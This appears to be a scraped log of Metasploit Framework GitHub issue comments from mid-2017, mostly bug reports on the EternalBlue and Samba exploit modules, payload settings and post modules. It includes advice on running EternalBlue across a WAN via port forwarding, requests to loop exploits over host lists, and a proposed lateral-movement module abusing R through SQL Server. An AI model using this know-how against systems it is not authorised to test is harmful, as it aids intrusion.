As you can see proposed payloads are wrong (ms

[2017-05-30 09:35] legendary77 commented on #8478
[http://i.imgur.com/qJS6jG0.png](url)

[http://i.imgur.com/OPvr16W.png](url)

See

[2017-05-30 12:04] busterb commented on #8483
Kali 2.0? Please update to Kali Rolling 2017.01 or later. Kali 2.0 has been dead for a long time.

Also, Kali Rolling do not appear to ship this exploit yet, so I'd advise just waiting until Kali packages the latest Metasploit framework release. I double-checked and cannot reproduce this issue with latest Kali or omnibus nightly package. Sounds like you might have a bit of a Frankenstein locally?

[2017-05-30 12:09] tsellers-r7 opened #8486 "ms17_10_eternalblue: VerifyArch fails when 135/tcp isn't open"
The ms17_10_eternalblue `VerifyArch` feature introduced via PR #8476 fails when 135/tcp isn't open.  Unlike the error message for `VerifyTarget` there isn't helpful text to indicate that disabling `VerifyArch` will help.  This is due to `Rex::ConnectionTimeout` being unhandled as a specific exception.

Relevant section:
https://github.com/rapid7/metasploit-framework/pull/8476/files#diff-2da4b4e901

[2017-05-30 12:09] busterb commented on #8478
This is definitely a configuration error on your side @legendary77 . You have the wrong IP address specified for LHOST. See where it says 'handler failed to listen' ?

If you're listening on a WAN and this is a port forward, LHOST needs to be your _public_ IP, and ReverseListenerBindAddress needs to be set to your private address. I suspect you already have something locally listening on 444, whic

[2017-05-30 12:09] #8478 closed

[2017-05-30 12:19] Ug0Security commented on #8483
sorry for my mistake, i work on a Kali Linux 64 bit VBox  2016.2
So msf is preinstalled and i've updated it.

i've added the exploit manually from exploit-db this morning , i also tried some previous version of the exploit yesterday (copied from github) . Yesterday everthing was fine, now i've add the exploit from exploit-db the system seems to be broken

For some reason the payloads suggestion ch

[2017-05-30 12:27] busterb commented on #8483
the latest version of the exploit needs a lot of library changes from metasploit to work. You can't just drop it in without carefully extracting all of the extra pieces too, which is definitely going to invalidate the warranty :). I'd recommend waiting or grabbing the latest omnibus package.

[2017-05-30 12:29] busterb commented on #8483
Also, the exploit from exploit-db trails what's in Framework by quite a bit. We can't support grabbing stuff from there after it's already in the tree.

[2017-05-30 12:38] Ug0Security commented on #8483
Ok, i guess i'll go to 2017.1 meanwhile :)
and i understand for the support of course.

Just to share i manage to reproduce the issue on Kali Linux 32 bit VBox PAE 2016.2 but whatever, thx for fast answer

[2017-05-30 13:03] busterb commented on #8483
If you can give some steps I can reproduce, can certainly reopen and take a look at it. I have an up-to-date 2017.1 box with v4.14.21-dev ready to go.

[2017-05-30 13:06] busterb commented on #8486
Nice catch @tsellers-r7 - I'll put up a PR to handle that.

[2017-05-30 13:11] busterb commented on #8486
Fix PRed, would you mind checking it out @tsellers-r7 ? Thanks.

[2017-05-30 13:34] Ug0Security commented on #8483
Here the steps i've made this morning

1- add exploit from exploit-db (https://www.exploit-db.com/exploits/42084/)
2- reload_all metasploit
3- use exploit/yourpath/is_known_pipename
4- set payload 'TAB TAB'
5- use exploit/windows/smb/ms08-067_netapi
6- set payload 'TAB TAB'

Here the proof on two vm with both Arch x86 and x64

![image](https://cloud.githubusercontent.com/assets/28728543/26584969/0

[2017-05-30 13:45] Ug0Security commented on #8483
Same issue on Armitage, same steps 3 to 6 the to first are useless.

It seems that once you selected an exploit and autocomplete the payload
The next exploit you'll choose will have same payloads.

Tell me if you more info and if you managed to reproduce

[2017-05-30 13:57] FireFart commented on #8448
@busterb msfupdate should be gone in the next release: https://bugs.kali.org/view.php?id=4039

[2017-05-30 16:54] dwendt commented on #7323
Happens in my case as well, but it never gets to the first hash. The ntds.dit in this situation is ~800mb.

[code]

Of course, the post module wasn't interrupted by me. The meterpreter session is hanging, presumably while it parses the massive file....

[code]

If doing it on a remote server is too stressful for the machine, maybe it's better to pull the file down to the metasploit server and pars

[2017-05-30 17:51] tsellers-r7 commented on #8486
@busterb  That PR works in my testing. (sorry for the delay, I had notifications off for some reason).

[2017-05-30 18:16] wvu-r7 commented on #8486
This was not an oversight but rather developer brain thinking the error was useful enough. Note that none of the other wrapped errors print the warning due to the early returns. I'm reworking this as we speak.

[2017-05-30 18:19] zerosum0x0 commented on #8477
This should have been fixed in #8399

We can tell this example doesn't have #8399 because there is no "CORE buffer dump" for the banner string.

[2017-05-30 18:21] zerosum0x0 commented on #8459
The exploit, like the original, does not trigger everytime, particularly if there is a heavily fragmented pool.

[2017-05-30 18:21] #8486 closed

[2017-05-30 18:24] zerosum0x0 commented on #8447
Please provide `%SystemRoot%\memory.dmp` file if you can, otherwise nothing can be done to to diagnose any BSoD issues.

[2017-05-30 19:22] linuxdaddy commented on #8447
Hello, thanks for the reply. It didnt let me upload it here so i used mediafire. Here is the dmp file. Thanks in advance!
http://www.mediafire.com/file/u559yl82jcwv1j2/052917-24523-01.dmp

[2017-05-30 19:29] linuxdaddy commented on #8447
Okay that one was the BSoD of the last time i tried the exploit, before the exploit was updated. Now that it is updated it doesnt crash the pc. If i am right this error is because my target is x86 and this exploit supports x64 only. Regards!

![screenshot from 2017-05-30 21-26-49](https://cloud.githubusercontent.com/assets/26394383/26601141/0b76f3be-457f-11e7-9dfc-a3e6b14672db.png)

[2017-05-30 19:36] busterb commented on #7323
CC @dmaloney-r7, what we probably need is a more realistic environment to test this against. Sounds like we're getting hung up on something specific to this DC.

[2017-05-31 00:26] h00die commented on #8480
I want to note something on this ticket so I can reference it later.

Here's why this is a good ticket:
1. target is clearly defined (linux box with system V, example metasploitable 3... i actually think you mean 2)
2. clear instructions on what settings were used to trigger the bug, with step by step recreation instructions
3. explanation of what the exact issue is (running the start command fail

[2017-05-31 02:00] h00die opened #8490 "Sample Output vs Scenarios in documentation"
https://github.com/rapid7/metasploit-framework/pull/8482#discussion_r119255458 brings up a good point on the consistence of docs and using Scenario vs Sample Output.

Also, using L3 headings on some of the older stuff for whats actually being shown as tested

[2017-05-31 02:01] h00die commented on #8490
anyone could take this ticket, just tagging myself as a reminder to look into it in a few days

[2017-05-31 02:12] h00die commented on #8490
as per that comment,
[code]
are all the ones with no version stuff in it

[2017-05-31 02:44] h00die commented on #8480
fixed the newline issue you found, and the later bug where the system start wouldn't work since system isn't there.  Give it a try, lemme know if this patch works for you (i ran against metasploitable2)

[code]

[2017-05-31 03:55] carnal0wnage commented on #8408
ran into this awhile back. here is my workaround  http://carnal0wnage.attackresearch.com/2015/08/metasploit-vhosts-in-mass.html

[2017-05-31 07:46] bcoles commented on #8278
Found the error in `framework.log` :

[code]

[2017-05-31 10:47] void-in commented on #8447
@linuxdaddy You are targeting x86 Windows 7 while the module only supports x64 at the moment.

[2017-05-31 12:03] linuxdaddy commented on #8447
I tried it with x64. Doesnt work on WAN. I use pptp vpn that has port
forwarding and all i get when i run the exploit is connection timed out.

On May 31, 2017 12:48 PM, "Waqas Ali" <notifications@github.com> wrote:

[2017-05-31 12:10] islamTaha12 commented on #8447
@linuxdaddy  please do _show option advanced_ and post it here

[2017-05-31 12:34] linuxdaddy commented on #8447
Here:

![screenshot from 2017-05-31 14-31-26](https://cloud.githubusercontent.com/assets/26394383/26631975/fd837d06-460d-11e7-8f87-041d04af79df.png)

[2017-05-31 12:51] islamTaha12 commented on #8447
sorry i do a typo the correct cmd is  _show options advanced_

[2017-05-31 13:03] linuxdaddy commented on #8447
![kk](https://cloud.githubusercontent.com/assets/26394383/26633004/3eda489e-4612-11e7-9791-3fdaaa9c3026.jpg)

[2017-05-31 13:16] islamTaha12 commented on #8447
but u didnt set a payload?!

[2017-05-31 13:17] linuxdaddy commented on #8447
Isnt it automatically set?

[2017-05-31 13:23] linuxdaddy commented on #8447
Because in LAN it works like a charm.

[2017-05-31 13:25] islamTaha12 commented on #8447
in my case I set a payload, id it was set automatically may be u can tell me what is the payload and what is the options for it

[2017-05-31 13:29] busterb commented on #8447
Setting the payload is likely important, because over a WAN (I'm presuming you're doing port forwarding), you'll want to set LHOST to be your _public_ IP address. Otherwise it will default to something that is unlikely to be routable.

[2017-05-31 13:31] islamTaha12 commented on #8447
@busterb
Is that possible to set a list of rhosts ips and loop over them one by one automatically?

[2017-05-31 13:32] linuxdaddy commented on #8447
Yes i know, i did set them all. Here is the screenshot.

![ayy](https://cloud.githubusercontent.com/assets/26394383/26634250/513665e6-4616-11e7-93e2-10b10826f60e.jpg)

[2017-05-31 13:36] islamTaha12 commented on #8447
@linuxdaddy Your local ip is the public one?

[2017-05-31 13:37] linuxdaddy commented on #8447
Lhost is my external ip, do i have to set my 192.168.1.... ip?

[2017-05-31 13:40] islamTaha12 commented on #8447
@linuxdaddy
You have to set LHOST=<public_ip>, do portforward in your router and start the payload in your local ip.

Are u sure this target has the vunl?
Did u do scan for it before trying to exploit?

[2017-05-31 13:43] linuxdaddy commented on #8447
The target is vuln, its my other pc. It works in LAN. But i am using VPN. PPTP vpn, because my router doesnt have the port forward option(its blocked). The ISP blocks it. I can do port forwarding with vpn and it works when i try it with .exe or .bat payload or whatever. But eternalblue gives me timeout.

[2017-05-31 13:46] islamTaha12 commented on #7614
is there any update in this issue?

is there any way to set rhosts and loop over them trying to exploit or not?

[2017-05-31 14:26] islamTaha12 commented on #8447
did u set this option?
 ReverseListenerBindAddress

[2017-05-31 14:30] linuxdaddy commented on #8447
Tried it, still same result

[2017-05-31 14:32] linuxdaddy commented on #8447
I even tried using FuzzBunch, in LAN it works immediately, in WAN says connection timed out.

[2017-05-31 14:36] linuxdaddy commented on #8447
Everything is updated to lasted version from source.

[2017-05-31 14:38] islamTaha12 commented on #8447
restart your target machine and retry ... It happened to me once in Lan

[2017-05-31 14:44] linuxdaddy commented on #8447
Tried, still timeout.

[2017-05-31 14:51] islamTaha12 commented on #8447
ask a friend to try to hack it may be port forwarding in your system doesn't go well, however, I don't understand how can u reach a local machine through your public ip

[2017-05-31 14:54] linuxdaddy commented on #8447
When i create a powershell payload, when i set up the listener, i put my VPN ip on lhost. When i run the payload on the target machine it gives me session. I just dont understand why eternalblue doesnt work, maybe it's configuration is not made for this kind of port forwarding(with vpn). Thanks for your help. Btw my friends dont even know how to create an email. Regards!

[2017-05-31 15:06] busterb commented on #8447
I don't think this is a problem with the exploit but getting networking setup. If you're going over a VPN, you'll have to make sure you use the right VPN IPs, and make sure that all of the proper routes are setup both directions. I'd suggest just trying to do something simple like browse an SMB share over the VPN first, or use netcat to verify routing.

Going to close this ticket since this is tur

[2017-05-31 15:06] #8447 closed

[2017-05-31 15:23] alrosenthal-r7 commented on #8444
# Release Notes

This fix resolves an issue that prevented the rake spec builds from running.

[2017-05-31 16:36] dmaloney-r7 commented on #7323
@dwendt What OS is the server? It shouldn't be pegging the CPU either. It does not parse the entire NTDS.dit file, that's the whole point of this system. It connects to the database using the JET Engine and pulls the hashes out in batches. This would be impossible to do on your local machine unless you happen to be running Metasploit on Windows for some reason. Downloading NTDS.dit and parsing it

[2017-05-31 21:02] tfriesen opened #8496 "creds -R fails with error"
## Steps to reproduce

1. msfconsole
2. creds -R

Fails with or without creds in the db and with or without other options to 'creds'.

## Expected behavior

All hosts stored in the creds db are added to RHOSTS, same as 'services' and 'hosts' commands

## Current behavior

[code]

## System stuff

### Metasploit version

Framework: 4.14.22-dev
Console  : 4.14.22-dev

### I installed Metasploit with

[2017-05-31 21:03] tehseensagar opened #8497 "unable to start metasploit errors"
Unable to start metasploit keep getting following errors

root@local:/opt/metasploit-framework# ./msfconsole
/opt/metasploit-framework/config/boot.rb:19: undefined method `to_path' for #<Pathname:/opt/metasploit-framework/Gemfile> (NoMethodError)
        from /opt/metasploit-framework/config/boot.rb:15:in `each'
        from /opt/metasploit-framework/config/boot.rb:15
        from ./msfconsole:45:

[2017-05-31 21:53] wvu-r7 commented on #8496
#7655

[2017-05-31 22:41] tfriesen commented on #8496
[#8493](https://github.com/rapid7/metasploit-framework/pull/8493)

This is what I get for putting off reporting a bug for a day, and then not checking the pull requests first :)

[2017-05-31 22:56] wvu-r7 commented on #8496
Oops, this is actually related to #7804. Similar issue, though.

[2017-06-01 01:00] h00die commented on #8490
scenario is 118 vs sample output 29

[2017-06-01 02:55] bcoles commented on #8490
For auxiliary modules Scenario makes more sense than Sample Output as there's different `ACTION` to be performed, and various configurable options, for different scenarios. Each module is different and the configurations vary wildly.

Sample Output makes sense for exploit modules. Exploits are often more straight forward. There's usually one scenario: get a session. Set a `RHOST`. Optionally, chan

[2017-06-01 14:29] nas7e1 opened #8500 "no hosts showing after successful db_import of nmap ping scan"
## Steps to reproduce

How'd you do it?

1. Import XML from external nmap ping scan (nmap -sn x.x.x.x)
2. run db_nmap using the -sn switch for ping scan
3. There are no errors shown in either situation

nmap version: 7.40

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and

[2017-06-01 16:00] darkbushido commented on #8258
I think we should fix this the same way I'm trying to do it in creds, #8493 mostly to avoid code duplication.

[2017-06-01 17:51] busterb commented on #8497
Ruby 1.8.7 is definitely not supported. 2.4 is preferred. Try installing at least ruby 2.1, or grabbing our pre-built packages: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

[2017-06-01 17:51] #8497 closed

[2017-06-01 17:53] busterb commented on #7614
one-liner RC script that does what you want for now:
[code]

[2017-06-01 17:58] busterb commented on #8483
Ah, interesting. This doesn't have anything to do with downloading from exploitdb, it seems the payload values get cached between module switches, so it shows the wrong set on the second exploit module every time.

[2017-06-01 18:39] busterb commented on #8438
I don't think we're retagging old releases, and we have force push disabled, so it's not possible to rewrite history in master. Do you have a couple of tarballs to compare deltas with?

[2017-06-01 19:29] #8496 closed

[2017-06-01 23:33] drimaed commented on #8477
[code]
I hope this could help

[2017-06-02 03:03] void-in commented on #8477
@drimaed The target OS is 32 bit. The module in MSF tree right now only target x64 as you can see from the show targets option.

[2017-06-02 05:04] zerosum0x0 commented on #8477
@drimaed The target could possibly be 64-bit. The problem here is the kernel version is 6002, meaning it is not Server 2008 R2.

Server 2008 is based on Vista. Server 2008 R2 is Windows 7.

Vista is not currently supported.

[2017-06-02 15:10] NJHacker opened #8501 "NO-IP and Metasploit Question/Problem"
Hi,
I've started to use Metasploit with an no-ip host and encountered a problem.
For this experiment I used the exploit/windows/misc/regsvr32_applocker_bypass_server.
Let's say my external IP is 100.100.100.100, my local one is 192.168.1.25 and my no-ip host is hacker.no-ip.biz. Moreover, the uripath is "test", lport is 8081 and srvport is 8080.
The generated output that I should run according to

[2017-06-02 15:43] wvu-r7 commented on #8501
What's your `LHOST`? You need to provide the actual options.

[2017-06-02 15:45] wvu-r7 commented on #8501
Since I assume your `LHOST` is 192.168.1.25 as per your text, that's where the payload will connect. Please post console output to verify.

[2017-06-02 15:46] wvu-r7 commented on #8501
Looks like this comes from `get_uri`. Try setting `URIHOST`?

[2017-06-02 15:53] wvu-r7 commented on #8501
You can disregard the previous questions about `LHOST`, since I apparently can't read. Your problem here should be remedied by setting `URIHOST` to an external address.

[code]

[2017-06-02 15:53] #8501 closed

[2017-06-02 19:54] dmaloney-r7 commented on #7323
well size has nothing to do with it afaict. I just dumped a domain with ~5k users in under 2 minutes

[2017-06-02 20:34] dmaloney-r7 commented on #7323
well number of suers anyways, even with 5k users, it's still only about 27mb, but I don't think that's the right avenue since @Slurpgeit ran into this with only 200 suers so probably a pretty small database.

I've also checked to see if it had a problem when the samaccountname has a space in it...it worked fine

@Slurpgeit would this happen to be a Non english environment? wondering if it might be

[2017-06-02 21:49] dougives opened #8505 "msfconsole on UTF-8 terminal does not echo back text correctly on tab-completion, backspace"
## Steps to reproduce

I'm using msfconsole on kali-rolling with urxvt from kali's repos. When using a utf-8 terminal, tab-completion will overwrite a displayed character. Using backspace also causes inconsistencies. Occasionally tabbing will also clear the screen, but I could not reproduce it. Inputting single-byte characters will cause this effect.

## Expected behavior

Console echos expected i

[2017-06-02 23:47] h00die opened #8506 "VMWare Workstation Priv Esc"
As per request by @sempervictus someone should write
https://www.exploit-db.com/exploits/42045/

for reals though, its a softball beyond softballs.

[2017-06-03 00:45] wvu-r7 commented on #8506
Not a blocker, but it's a notable requirement. Can probably use `vmrun` or whatever.

[2017-06-03 01:56] makefu commented on #8438
@busterb unfortunately right now i do not have a sample but once the issue re-occurs i will provide you with a sample.
(closing this issue for now)

[2017-06-03 14:23] jinq102030 opened #8510 "Make the module name/path more consistent"
## Steps to reproduce

How'd you do it?

1. ./msfconsole
2. use exploits/linux/http/kloxo_sqli
3.
[code]

Notice the word "exploits" in the "use ..." command and "exploit" in the module name as the output of "show options"?

Sometimes when I need to open the actual ruby file for the module, it's easy to specify the file path by copying "exploit/linux/http/kloxo_sqli" from "show options" command an

[2017-06-03 18:05] dougives commented on #8505
I happened to set up msf from source on ubuntu server 17.04 this morning with urxvt and scim instead, and it does not have this issue.

[2017-06-03 23:30] wvu-r7 commented on #8510
This is almost a duplicate of #7693 and should be resolved by #7734.

[2017-06-03 23:31] wvu-r7 commented on #8510
Oh, you're asking something else. No, I think that should stay as a reference name. You can use the `edit` command to open the file in your editor.

[2017-06-03 23:40] h00die commented on #8500
I'm showing the same thing on my end.

[2017-06-04 00:11] wvu-r7 commented on #8500
So, I thought I remembered there being a reason for this, but now I can't find the source. Let's fix this to do the right thing instead.

[2017-06-05 13:58] #8269 closed

[2017-06-05 14:53] sempervictus commented on #8407
So the only part of this i can safely say is "my fault" is 902f0dfa2552d153ffa0e1e830a343b816dce3f7 on the old meterpreter repo when i wrote the x64 migration code. Both the ThreadContext and pImageBase allocations are done with PAGE_READWRITE.

[2017-06-05 15:09] sempervictus commented on #8407
BTW, there're efforts afoot to implement a proper upstream LSM for MPROTECT, so this may become very necessary, very quickly.

[2017-06-05 15:34] dade80vr commented on #8302
Same problem here. I want to use OSX 10.11.6

[2017-06-05 16:15] busterb commented on #8302
Been struggling to get the OS X build to actually generate pre 10.12 binaries. Anyone have ideas?

[2017-06-05 16:15] busterb commented on #8302
Seems to be an issue with XCode 8

[2017-06-05 17:28] dmaloney-r7 commented on #7323
tested with Arabic and Tamil characters in both the name and username fields and it still worked fine...

[2017-06-05 21:38] KyleHanslovan commented on #8423
Independently ran into this same issue today. The password "Mau’dib" triggered this bug from the [common_roots.txt](https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/common_roots.txt) word list (not an ASCII apostrophe).

I confirmed that removing this password from the word list no longer triggered this bug.

[2017-06-05 22:40] #8490 closed

[2017-06-06 11:39] busterb commented on #7722
#8503 addresses x86. We should probably also look at doing the same for x64 since it's a lot more common, and maybe arm / mips too.

[2017-06-06 15:45] dmaloney-r7 commented on #7323
![screen shot 2017-06-06 at 10 42 09 am](https://user-images.githubusercontent.com/1146440/26838219-218415b2-4aa5-11e7-893d-504683d3fb45.png)

In the above image we can see users with high ascii and some different unicode sets all working, even with crazy space arrangements

[2017-06-06 22:21] shawndeckerr opened #8521 "smb_login issue: RubySMB::Error::NetBiosSessionService NBSS Header is missing"
## Steps to reproduce
The auxiliary/scanner/smb/smb_login module throws a RubySMB error when used. This works perfect on my previous version of Kali Linux until I installed a new version and updated Metasploit.

Issue: Using the auxiliary/scanner/smb/smb_login module, the scanner comes up with a RubySMB error that reads:
[*] Error: 192.168.20.203 RubySMB::Error::NetBiosSessionService NBSS Header i

[2017-06-06 23:58] ss23 opened #8522 "modules/auxiliary/gather/konica_minolta_pwd_extract.rb"
## Steps to reproduce

How'd you do it?

1. Run modules/auxiliary/gather/konica_minolta_pwd_extract.rb against a Konica Minolta C654
2. Observe an error:
[code]

When fixing this bug, it might also be useful to add C654 to the list of supported printers.

I was able to easily work around this issue by changing the "register_creds" to simply return before execution.

## System stuff

### Metasploit

[2017-06-07 03:04] anwareset opened #8524 "is_known_pipename.rb can't be used on msfconsole"
msf > use exploit/linux/samba/is_known_pipename
[-] The supplied module name is ambiguous: uninitialized constant Msf::Modules::Mod6578706c6f69742f6c696e75782f73616d62612f69735f6b6e6f776e5f706970656e616d65::MetasploitModule::ARCH_MIPS64LE.

[2017-06-07 07:55] busterb commented on #8524
Hi - are you actually running the latest version of metasploit, or did you slip this exploit file into your own, older copy? You need to actually be running the latest version of metasploit to use this module, just copying that one file won't work, as you observed, because it needs some library additions.

[2017-06-07 08:22] #8258 closed

[2017-06-07 08:28] #8510 closed

[2017-06-07 08:31] wvu-r7 commented on #8524
Someone asked the same thing on IRC. It was most definitely that.

[2017-06-07 08:33] wvu-r7 commented on #8522
I think it needs to be an IP. The module is scraping the result straight from XML.

[2017-06-07 08:34] busterb commented on #8524
Roger

[2017-06-07 08:34] #8524 closed

[2017-06-07 17:49] wvu-r7 commented on #7723
This is definitely done.

[2017-06-07 17:49] #7723 closed

[2017-06-07 20:20] jeffmcjunkin opened #8525 "post/windows/gather/cachedump broken"
## Steps to reproduce

How'd you do it?

1. Gain windows/meterpreter/reverse_tcp on Win10 x64 (Build 15063) or Windows 7 x64 (Build 7601) via exploit/windows/smb/psexec
2. Run post/windows/gather/cachedump

[code]
I also tested 64-bit Windows 7, expecting this module to only be broken in Windows 10. That wasn't true, however:

[code]

## Expected behavior
I expected to get mscash2 output suitable

[2017-06-07 23:44] jeffmcjunkin commented on #8389
I'm completely an outsider here, but I think reverse_https is the only stager that I'd ever expect or want to use paranoid mode with.

[2017-06-07 23:46] OJ commented on #8389
The requirement for UUID support goes deeper than _just_ paranoid mode.

[2017-06-08 06:01] shawndeckerr commented on #8483
Noticed the same issue when dealing with exploit/windows/smb/ms17_010_eternalblue as well.
After using the eternalblue exploit, I used exploit/windows/smb/psexec but at this point, 'set payload <TAB><TAB>' (autocomplete) will only display windows/x64/ payloads.
However, 'show payloads' will show genuinely available payloads so you could workaround with that in the interim.
I'm using newly installe

[2017-06-08 08:27] ss23 opened #8527 "exploit/windows/smb/ms17_010_eternalblue instability on 2008 R2 SP1"
Running the EternalBlue module against an unpatched Microsoft Windows 2008 R2 SP1 host (from MSDN: en_windows_server_2008_x64_dvd_x14-26714.iso - I can provide this if someone would like it for testing) results in crashed processes, normally within seconds of a "failed" exploitation attempt. The result is a Windows prompt: "Windows has encountered a critical problem and will restart automatically

[2017-06-08 08:48] OJ opened #8528 "Add module that abuses R via SQL server"
As per [this pastebin](https://pastebin.com/zBDnzELT):
[code]

Would be great to have a module that allows for lateral movement using this "feature". Tagging myself as the assignee as I'm keen to make this happen.

[2017-06-08 10:35] timwr commented on #8527
I've been able reproduce this on a Windows 7 guest in Virtualbox. It takes a few tries though.

[2017-06-08 12:45] hrbrmstr commented on #8528
Rly nice work @OJ. If you ever need to bounce stuff off of another R/security person let me know (I'll be following this thread, too).

While R's official package repository inclusion process is better than other projects (like Python's wild west) it's a totally legit — and, IMO likely — scenario to convince R users that a particular package (in CRAN or GitHub) is really useful and get them to run

[2017-06-08 13:34] alejandr29l commented on #4920
Can i do this outside the land?

[2017-06-08 18:22] s00ner commented on #4644
+1 SOCKS5 would be helpful.

[2017-06-08 18:52] dmaloney-r7 commented on #8527
I ran into this same issue before doing the refactor, and while doing the refactor. The packets being sent from the original vs the refactor are 100% identical. So this is an existing problem. I don't know enough about the actual mechanism at work here to guess why

[2017-06-08 18:53] dmaloney-r7 commented on #8527
When testing I was using a Windows 7 guest in VMware fusion

[2017-06-09 01:05] Paulithecoder opened #8531 "[-] Error getting output back from Core; aborting..."
Can anybody help? I'm getting these errors when I run Eternalblue on metasploit (in kali).

[*] Started reverse TCP handler on 192.168.1.78:4444
[*] 192.168.1.109:445 - Generating Eternalblue XML data
[*] 192.168.1.109:445 - Generating Doublepulsar XML data
[*] 192.168.1.109:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.109:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 1

[2017-06-09 01:06] #8531 closed

[2017-06-09 02:58] TheNaterz commented on #7989
Right, so about this. The API has a note about this under [rpc_meterpreter_read](http://rapid7.github.io/metasploit-framework/api/Msf/RPC/RPC_Session.html#rpc_meterpreter_read-instance_method) and [rpc_meterpreter_write](http://rapid7.github.io/metasploit-framework/api/Msf/RPC/RPC_Session.html#rpc_meterpreter_write-instance_method):

This reason behind this, and someone should correct me if I'm wr

[2017-06-09 03:28] TheNaterz commented on #7879
If this is all you're looking for, this is easy. The uuid value you see in the RPC list refers to the session uuid and not the payload uuid. See below:
[code]
The verbose output you see from msfconsole includes session.payload_uuid. Again, see below:
[code]
I have an open PR #8529 which adds the architecture of the payload to the RPC session list. If there's still interest in the payload UUID, we

[2017-06-09 06:28] busterb commented on #8525
Can you verify if you're using AES256 now as the hash type? The module assumes AES128 for vista and above, which may not be correct for later versions.

[2017-06-09 07:18] #8522 closed

[2017-06-09 23:57] Mehere0005 commented on #6472
i did'nt work for me it say meterpreter session died can any one help me ?

[2017-06-10 00:00] Mehere0005 opened #8536 "OpenSSL::SSL::SSLError: SSL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A i have this problem when i exploit my payload in metasploit can you help me please"
OpenSSL::SSL::SSLError: SSL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A i have this problem when i exploit my payload in metasploit can you help me please
i use  windows/meterpreter/reverse_tcp payload  on local host
iv change it to php/meterpreter/reverse_tcp  the error gone but i tell that the meterpreter session died

[2017-06-10 02:18] nexusbruno2001 opened #8537 "many modules assume the Windows target language is English"
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/steam.rb

You need to make us able to change the _Path_

For example mine it's not **C:\Program Files (x86)\**

It's **C:\Programas (x86)\**

[2017-06-10 03:11] h00die commented on #8537
This is actually all over the place, just a few examples of where it would need to also be fixed:
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/smartermail.rb#L73
https://github.com/rapid7/metasploit-framework/blob/97095ab3113de2f046e64a64c461a1f888554401/modules/post/multi/manage/dbvis_add_db_admin.rb#L168
https://github.com/rapid7/metasploit-f

[2017-06-10 08:00] Swiftb0y opened #8538 "Openvas_connect not working"
## Steps to reproduce

[code]

## Expected behavior

idk, I guess it should connect to the openvas scanner?

## Current behavior

See above. Works fine via the openvas-webinterface.

[code]

### Metasploit version

metasploit v4.14.24-dev

### I installed Metasploit with:

Kali package via apt

### OS
uname -r:
4.9.0-kali4-amd64

[2017-06-11 04:44] iweizime commented on #8527
I got the same problem when I used the payload windows/meterpreter/reverse_tcp instead of windows/x64/meterpreter/reverse_tcp for mistake. When using windows/x64/meterpreter/reverse_tcp as payload, it works fine.

[2017-06-11 04:55] GhostNaix opened #8541 "MS17-010 Support for Windows 8/Windows server 2012 x64"
Please update the module to allow execution upon windows 8/Windows server 2012

More info:
https://www.exploit-db.com/exploits/42030/

[2017-06-11 09:30] m7x opened #8542 "browser_autopwn2 no loading ms16_051_vbscript"
Is there any particular reason why `browser_autopwn2` doesn't load the latest IE exploit `exploits/windows/browser/ms16_051_vbscript.rb` ?

Thanks
## Steps to reproduce
[code]
## Expected behavior

Should load `ms16_051_vbscript`

## Current behavior

Doesn't load `ms16_051_vbscript`

## System stuff

### Metasploit version

`metasploit v4.14.22-dev`

### I installed Metasploit with:
- [X ] Kali p

[2017-06-11 18:54] wvu-r7 commented on #8542
Because it wasn't configured for it. Easy patch if you want to do it.

[2017-06-11 21:00] m7x commented on #8542
Thanks. Would that just require `include Msf::Exploit::Remote::BrowserExploitServer` to configure it?

[2017-06-12 00:35] kalifan opened #8544 "After update exploits/windows/smb/ms17_010_eternalblue.rb i get this... error"
[code]
before update exploit does it work fine. i dont needed use credentials. i could execute arbitrarily.

[2017-06-12 05:27] void-in commented on #8544
The target server might be updated and patched. Have you checked if it is still missing the KB? You can check it through ```wmic qfe hotfixid | find "<MS17-010 KB for the OS>"```. You can find more info at https://support.microsoft.com/en-us/help/4023262/how-to-verify-that-ms17-010-is-installed

[2017-06-12 05:30] OJ commented on #8528
Thanks @hrbrmstr, I can't claim the work is my own, I just stumbled on the pastebin thanks to Twitter. It fits nicely with the previous MS SQL module that I worked on based on other people's work as well. I think it'd be good to see something like that in MSF. When I get time, I'll put something together. Certainly keen to demonstrate stuff to the R community too so that they can be aware of the r

[2017-06-12 10:48] anwareset commented on #8524
Solved by using the first release version.

[2017-06-12 11:20] saikumar100 opened #8546 "is_known_pipe.rb is throwing RuntimeError Invalid DCERPC response"
Hi I am using latest Metasploit-framework version.
When i use is_known_pipe.rb I got into this error
 Exploit failed: RuntimeError Invalid DCERPC response: not enough data

[2017-06-12 14:24] isbear opened #8548 "Fix for nessus_template_list argument parsing"
This is regarding PR #8534 , I guess, I should have created the issue first...

## Steps to reproduce

0. ./msfconsole
1. load nessus
2. nessus_connect (you'll need a running nessus for this)
3. nessus_template_list scan (outputs help message)
4. nessus_template_list policy (outputs help message)

After first fix with the argument parsing, I've run into another bug:

[code]

And indeed you did mea

[2017-06-12 15:07] busterb commented on #8536
github issues are not for support - try IRC or community.rapid7.com

[2017-06-12 15:07] #8536 closed

[2017-06-12 15:08] busterb commented on #8546
You'll have to include a lot more info than this, such as the target OS, Samba version, maybe a packet capture.

[2017-06-12 15:14] dmaloney-r7 commented on #8521
@shawndeckerr what kind of target system are you running this against, and can you provide a pcap of it happening?  I cannot reproduce this issue

[2017-06-12 15:37] cdoughty-r7 commented on #8438
@makefu Just following up here.  I've been unable to reproduce this.  We tested by downloading versions 4.14.21, 4.14.22, and 4.14.23 around 10 days ago then comparing them this morning and the sha sums match for me:
[code]

I'm happy to try other tests if it would help, but we are only tagging release versions here, nothing else.

[2017-06-12 16:30] kalifan commented on #8544
@void-in Ey bro thanks for answer me, but the target it was checked using nmap and script about vulnerability ms17-10 and the target it is vulnerable, the victim machine is my computer from WAN. any suggestion?

[2017-06-12 23:32] busterb commented on #8544
Do you have any target details (what OS, etc.) ?

[2017-06-13 05:46] sangria123 commented on #4973
i have problem how can i fix ?
msf>use exploit/
[-]failed to load modules: exploit

[2017-06-13 05:51] sangria123 opened #8550 "failed to load modules: exploit"
I install kali in my phone and i update and upgrade after that i opened metasploit and type msfconsole and type use exploit

Here:
msf> use exploit
